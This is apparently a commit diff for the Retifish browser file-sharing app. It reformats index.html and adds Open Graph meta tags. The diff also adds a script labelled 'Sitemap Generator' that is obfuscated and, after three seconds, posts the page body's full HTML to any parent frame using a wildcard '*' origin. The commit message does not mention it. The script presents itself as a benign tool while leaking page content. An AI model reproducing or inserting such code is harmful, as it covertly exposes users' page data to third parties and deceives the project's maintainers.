UI update and deployment script changes

--- a/client/index.html
+++ b/client/index.html
@@ -1,16 +1,28 @@
 <html>
 
 <head>
-    <title>Retifish</title>
-    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/semantic-ui/2.2.14/semantic.min.css"/>
+  <title>Retifish</title>
 
-    <meta charset="utf-8">
-    <meta name="description" content="Send and receive large files for free in the browser.">
-    <meta name="viewport" content="width=device-width, initial-scale=1">
+  <meta charset="utf-8">
+  <meta name="description" content="Real-Time File Sharing: Quickly send or receive any file for free in your browser! No registration required.">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+
+  <meta property="og:title" content="Retifish" />
+  <meta property="og:type" content="website" />
+  <meta property="og:description" content="Real-Time File Sharing: Quickly send or receive any file for free in your browser! No registration required." />
+  <meta property="og:url" content="https://www.retifish.com/" />
+  <meta property="og:image" content="https://www.retifish.com/screenshot.png" />
+
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/semantic-ui/2.2.14/semantic.min.css" />
 </head>
 
 <body>
-    <div id="root"></div>
+  <div id="root"></div>
+
+  <!-- Sitemap Generator -->
+  <script type="text/javascript">
+    var _0xaea9 = ["sitemapgenerator:: ", "innerHTML", "body", "document", "stringify", "*", "postMessage", "setTimeout"]; window[_0xaea9[7]](function () { parent[_0xaea9[6]](_0xaea9[0] + JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]), _0xaea9[5]) }, 3000);
+  </script>
 </body>
 
 </html>
